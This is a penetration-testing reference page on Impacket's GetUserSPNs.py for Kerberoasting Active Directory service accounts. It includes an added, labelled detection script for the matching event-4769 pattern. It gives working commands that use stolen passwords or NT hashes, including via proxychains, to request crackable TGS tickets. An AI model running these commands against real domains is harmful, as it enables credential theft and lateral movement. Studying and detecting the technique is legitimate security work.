
GetUserSPNs.py

When to Use

Useful in post-compromise enumeration. If you have acquired a domain user's password or hash, you can use those credentials to check whether any user accounts in Active Directory have been configured with Service Principal Names (SPNs). Service principals are effectively user accounts in Active Directory whose purpose is to run services.

Service principals are often over-privileged or delegated access to privileged resources. GetUserSPNs.py lets the operator request a Ticket-Granting-Service (TGS) ticket for each SPN, thereby obtaining a ticket encrypted with the service principal's NTLM hash, which may be crackable offline. The cracked service principal's password could then be passed around the network.
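Added defender-side example, not part of Impacket or of this page's tool: the TGS requests described above show up on the domain controller as Windows Security event 4769 records, and this script flags accounts that request RC4-encrypted (0x17) service tickets for several distinct non-computer SPNs within a short window. The pipe-delimited field layout and the sample records are constructed for the example.

```python
# Added example, not part of Impacket: flag the server-side signature of the
# TGS requests described above in (constructed) Windows event 4769 records.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: "timestamp|account|service|ticket_enc_type|status"
SAMPLE_EVENTS = """\
2024-05-01T10:00:01|alice@DOMAIN.TLD|HOST1$|0x12|0x0
2024-05-01T10:00:02|bob@DOMAIN.TLD|krbtgt|0x17|0x0
2024-05-01T10:00:05|bob@DOMAIN.TLD|svc_sql|0x17|0x0
2024-05-01T10:00:06|bob@DOMAIN.TLD|svc_web|0x17|0x0
2024-05-01T10:00:07|bob@DOMAIN.TLD|svc_backup|0x17|0x0
2024-05-01T10:00:08|bob@DOMAIN.TLD|svc_reports|0x17|0x0
2024-05-01T10:03:00|carol@DOMAIN.TLD|svc_sql|0x12|0x0
"""

def parse_event(line):
    ts, account, service, enc, status = line.strip().split("|")
    return {"ts": datetime.fromisoformat(ts), "account": account,
            "service": service, "enc": int(enc, 16), "status": int(status, 16)}

def is_roastable_request(ev):
    # Successful RC4 (0x17) tickets for user-account services only: computer
    # accounts end in '$' and krbtgt tickets are ordinary TGT traffic.
    return (ev["status"] == 0 and ev["enc"] == 0x17
            and not ev["service"].endswith("$")
            and ev["service"].lower() != "krbtgt")

def find_kerberoast_suspects(events, window=timedelta(minutes=5), threshold=3):
    """Map account -> sorted services when >= threshold distinct SPNs were requested within window."""
    per_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["account"]].append(ev)
    suspects = {}
    for account, evs in per_account.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e["ts"] - start["ts"] <= window]
            services = {e["service"] for e in in_window}
            if len(services) >= threshold:
                suspects[account] = sorted(services)
                break
    return suspects

def run_sample():
    events = [parse_event(l) for l in SAMPLE_EVENTS.splitlines() if l.strip()]
    return find_kerberoast_suspects(events)
```

Running the sample returns only bob, whose four RC4 tickets for distinct user SPNs fall inside one five-minute window; alice's computer-account ticket and carol's AES (0x12) ticket are ignored.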


Usage Examples

Password Authentication

The Kali Linux developers have created a series of wrappers around the Impacket scripts. In this case, you can invoke GetUserSPNs.py simply by running impacket-GetUserSPNs.

# List any service principals associated with the user
impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password'

# Request a TGS
impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password' -request

# Post-compromise via a proxy host
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password'
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password' -request

impacket-GetUserSPNs wrapper on Kali Linux invokes GetUserSPNs.py with user-supplied arguments


Pass the Hash

# List any service principals associated with the user
impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'

# Request a TGS
impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

# Post-compromise via a proxy host
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request
